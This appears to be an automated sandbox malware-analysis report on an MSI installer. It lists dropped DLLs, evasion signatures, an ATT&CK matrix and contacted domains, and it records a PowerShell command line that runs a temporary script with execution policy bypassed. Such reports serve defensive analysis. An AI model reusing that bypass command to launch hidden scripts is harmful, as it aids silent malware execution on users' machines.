Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Widgets.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-console-l1-2-0.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\clretwrc.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libreadline8.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\lib-channel.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Microsoft.CSharp.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7124Thread sleep count: 3694 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7124Thread sleep count: 5506 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6620Thread sleep time: -13835058055282155s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7132Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3272Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine10drawPixmapERK6QRectFRK7QPixmapS2_
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngineD1Ev
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine10fillBGRectERK6QRectF
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine19beginNativePaintingEv
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine18clipEnabledChangedEv
Source: Qt5Gui.dll.1.drBinary or memory string: __ZTS21QEmulationPaintEngine
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine6strokeERK11QVectorPathRK4QPen.cold
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine5beginEP12QPaintDevice
Source: Qt5Gui.dll.1.drBinary or memory string: .text$_ZN21QEmulationPaintEngineD1Ev
Source: Qt5Gui.dll.1.drBinary or memory string: .text$_ZNK21QEmulationPaintEngine5flagsEv
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine15drawTiledPixmapERK6QRectFRK7QPixmapRK7QPointF.cold
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine12drawTextItemERK7QPointFRK9QTextItem
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine16transformChangedEv
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine18renderHintsChangedEv
Source: Qt5Gui.dll.1.drBinary or memory string: .rdata$_ZTV21QEmulationPaintEngine
Source: Qt5Gui.dll.1.drBinary or memory string: __ZNK21QEmulationPaintEngine11createStateEP13QPainterState
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine9drawImageERK6QRectFRK6QImageS2_6QFlagsIN2Qt19ImageConversionFlagEE
Source: Qt5Gui.dll.1.drBinary or memory string: __ZNK21QEmulationPaintEngine4typeEv
Source: Qt5Gui.dll.1.drBinary or memory string: .eh_frame$_ZNK21QEmulationPaintEngine5flagsEv
Source: Qt5Gui.dll.1.drBinary or memory string: 21QEmulationPaintEngine
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine17endNativePaintingEv
Source: Qt5Gui.dll.1.drBinary or memory string: .rdata$_ZTI21QEmulationPaintEngine
Source: Qt5Gui.dll.1.drBinary or memory string: __ZTV21QEmulationPaintEngine
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine15drawTiledPixmapERK6QRectFRK7QPixmapRK7QPointF
Source: Qt5Gui.dll.1.drBinary or memory string: .eh_frame$_ZN21QEmulationPaintEngineD1Ev
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngineD0Ev
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine4clipERK11QVectorPathN2Qt13ClipOperationE
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine4fillERK11QVectorPathRK6QBrush
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine12brushChangedEv
Source: Qt5Gui.dll.1.drBinary or memory string: __ZTI21QEmulationPaintEngine
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngineC1EP14QPaintEngineEx
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine8setStateEP13QPainterState
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine10penChangedEv
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine10drawPixmapERK6QRectFRK7QPixmapS2_.cold
Source: powershell.exe, 00000003.00000002.1762656250.00000000087E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine18drawStaticTextItemEP15QStaticTextItem
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine18brushOriginChangedEv
Source: Qt5Gui.dll.1.drBinary or memory string: __ZNK21QEmulationPaintEngine5flagsEv
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine4fillERK11QVectorPathRK6QBrush.cold
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine3endEv
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine14opacityChangedEv
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine6strokeERK11QVectorPathRK4QPen
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine12drawTextItemERK7QPointFRK9QTextItem.cold
Source: Qt5Gui.dll.1.drBinary or memory string: .rdata$_ZTS21QEmulationPaintEngine
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngine22compositionModeChangedEv
Source: Qt5Gui.dll.1.drBinary or memory string: __ZN21QEmulationPaintEngineC2EP14QPaintEngineEx
Source: Qt5Gui.dll.1.drBinary or memory string: .eh_frame$_ZN21QEmulationPaintEngineD0Ev
Source: Qt5Gui.dll.1.drBinary or memory string: .text$_ZN21QEmulationPaintEngineD0Ev
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pssc17b.ps1" -propfile "c:\users\user\appdata\local\temp\msic168.txt" -scriptfile "c:\users\user\appdata\local\temp\scrc169.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scrc16a.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pssc17b.ps1" -propfile "c:\users\user\appdata\local\temp\msic168.txt" -scriptfile "c:\users\user\appdata\local\temp\scrc169.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scrc16a.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."Jump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Replication Through Removable Media		1
Command and Scripting Interpreter		1
DLL Side-Loading		11
Process Injection		21
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Software Packing		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp		LSA Secrets11
Peripheral Device Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
File Deletion		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\D3DCompiler_47_cor3.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Microsoft.CSharp.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Microsoft.DiaSymReader.Native.amd64.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Microsoft.VisualBasic.Core.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Core.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Gui.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Network.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Svg.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\Qt5Widgets.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\UnRAR.exe0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-console-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\axvlc.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\clretwrc.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\clrjit.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\coreclr.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\lib-audio-io.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\lib-basic-ui.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\lib-channel.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\lib-cloud-audiocom.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\lib-command-parameters.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libicuin68.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libicuuc68.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libreadline8.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libsodium-23.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libssl-1_1.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\libstdc++-6.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\steamerrorreporter.exe0%ReversingLabs
C:\Windows\Installer\MSIBD13.tmp0%ReversingLabs
C:\Windows\Installer\MSIBE8B.tmp0%ReversingLabs
C:\Windows\Installer\MSIBF76.tmp0%ReversingLabs
C:\Windows\Installer\MSIC052.tmp0%ReversingLabs
C:\Windows\Installer\MSIC0B1.tmp0%ReversingLabs
C:\Windows\Installer\MSIC100.tmp0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
https://github.com/mono/linker/issues/1416.0%Avira URL Cloudsafe
http://crl.certum.pl/ctnca.crl0k0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%Avira URL Cloudsafe
http://crl.certum.pl/ctsca2021.crl0o0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
http://ccsca2021.crl.certum.pl/ccsca2021.crl0s0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%Avira URL Cloudsafe
https://go.micro0%Avira URL Cloudsafe
http://repository.certum.pl/ctnca.cer090%Avira URL Cloudsafe
http://www.aiim.org/pdfa/ns/id/0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%Avira URL Cloudsafe
http://repository.certum.pl/ccsca2021.cer00%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%Avira URL Cloudsafe
https://www.certum.pl/CPS00%Avira URL Cloudsafe
https://github.com/dotnet/runtime0%Avira URL Cloudsafe
http://www.color.org)0%Avira URL Cloudsafe
http://repository.certum.pl/ctsca2021.cer00%Avira URL Cloudsafe
https://aka.ms/pscore6lB0%Avira URL Cloudsafe
https://github.com/Pester/Pester0%Avira URL Cloudsafe
http://subca.ocsp-certum.com050%Avira URL Cloudsafe
http://subca.ocsp-certum.com020%Avira URL Cloudsafe
http://crl.certum.pl/ctnca2.crl0l0%Avira URL Cloudsafe
https://www.openssl.org/H0%Avira URL Cloudsafe
http://subca.ocsp-certum.com010%Avira URL Cloudsafe
http://gay-domain.com0%Avira URL Cloudsafe
http://repository.certum.pl/ctnca2.cer090%Avira URL Cloudsafe
https://gay-domain.com/userLicense.php?iugeh=9501&aigfj=sojgjf&sufv=670%Avira URL Cloudsafe
http://ccsca2021.ocsp-certum.com050%Avira URL Cloudsafe
http://gay-domain.com/userLicense.php?iugeh=9501&aigfj=sojgjf&sufv=670%Avira URL Cloudsafe
https://gay-domain.com0%Avira URL Cloudsafe
http://www.certum.pl/CPS00%Avira URL Cloudsafe
https://github.com/mono/linker/issues/1906.0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
gay-domain.com
172.67.154.227
truefalse
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://gay-domain.com/userLicense.php?iugeh=9501&aigfj=sojgjf&sufv=67false
    • Avira URL Cloud: safe
    		unknown
    http://gay-domain.com/userLicense.php?iugeh=9501&aigfj=sojgjf&sufv=67false
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1759677985.0000000006239000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://crl.certum.pl/ctsca2021.crl0oMicrosoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://sectigo.com/CPS0lib-command-parameters.dll.1.drfalse
    • URL Reputation: safe
    		unknown
    http://repository.certum.pl/ctnca.cer09Microsoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0lib-command-parameters.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://ocsp.sectigo.com0lib-command-parameters.dll.1.drfalse
    • URL Reputation: safe
    		unknown
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1756900335.0000000005326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1760744523.0000000007830000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://www.aiim.org/pdfa/ns/id/Qt5Gui.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://crl.certum.pl/ctnca.crl0kMicrosoft.CSharp.dll.1.dr, Microsoft.DiaSymReader.Native.amd64.dll.1.dr, clrjit.dll.1.dr, D3DCompiler_47_cor3.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1756900335.0000000005326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1760744523.0000000007830000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://go.micropowershell.exe, 00000003.00000002.1756900335.00000000058C8000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    https://github.com/mono/linker/issues/1416.Microsoft.CSharp.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://contoso.com/Licensepowershell.exe, 00000003.00000002.1759677985.0000000006239000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://contoso.com/Iconpowershell.exe, 00000003.00000002.1759677985.0000000006239000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#lib-command-parameters.dll.1.drfalse
    • Avira URL Cloud: safe
    		unknown
